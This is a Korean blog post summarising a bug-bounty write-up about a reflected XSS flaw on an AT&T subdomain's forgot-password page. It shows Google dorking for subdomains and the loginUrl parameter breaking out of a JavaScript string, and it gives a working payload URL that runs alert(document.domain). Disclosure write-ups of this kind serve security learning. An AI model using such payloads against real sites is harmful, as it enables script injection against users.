일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | |||
5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 | 21 | 22 | 23 | 24 | 25 |
26 | 27 | 28 | 29 | 30 | 31 |
Tags
- Googledorks
- 면접후기
- 정보보호관리진단
- XSS
- writeup
- bugbounty
- 구글해킹
- 버그바운티
- 웹해킹
- wargame
- 우버
- 케쉴주4기
- 케이쉴드주니어
- report
- 호스트헤더
- IDOR
- 취약점
- wargmae
- 컨설팅
- hacker101
- 케이쉴드주니어4기
- CTF
- 인젝션
- 케쉴주
- game
- hackerone
- Today
- Total
Hack The World
Reflected XSS In AT&T 본문
미국 주식회사의 사이트인 AT&T 에서 발견된 XSS 인거같다.
원본 : https://medium.com/@godofdarkness.msf/reflected-xss-in-at-t-7f1bdd10d8f7
우선 헌터는 google dork 을 이용하여 서브도메인
site : *.att.com 을 검색하였다.
그결과 ilm.att.com 사이트를 발견하였고
이사이트에서
https://ilm.att.com/bizportal/spp/forgotPassword?loginUrl=https://ilm.aatt.com
으로 연결되는 사이트를 찾아고 소스를보니
var jsuerName=";
var jsloginUrl = 'https://ilm.att.com'; 으로 되있는것을 발견.
https://ilm.att.com/bizportal/spp/forgotPassword?loginUrl='">
으로 테스를 해보니
var jsuserName = '';
var jsloginUrl = ''"></;';
다음과 같이 소스코드가 나오면서 취약점을 발견.
xss payload 를 삽입.
https://ilm.att.com/bizportal/spp/forgotPassword?loginUrl=x';alert(document.domain);x='
그 결과 다음과 같이 xss 성공
소스코드를 보니
var jsuserName = '';
var jsloginUrl = 'x';alert(document.domain);x='';
다음과 같음.
Comments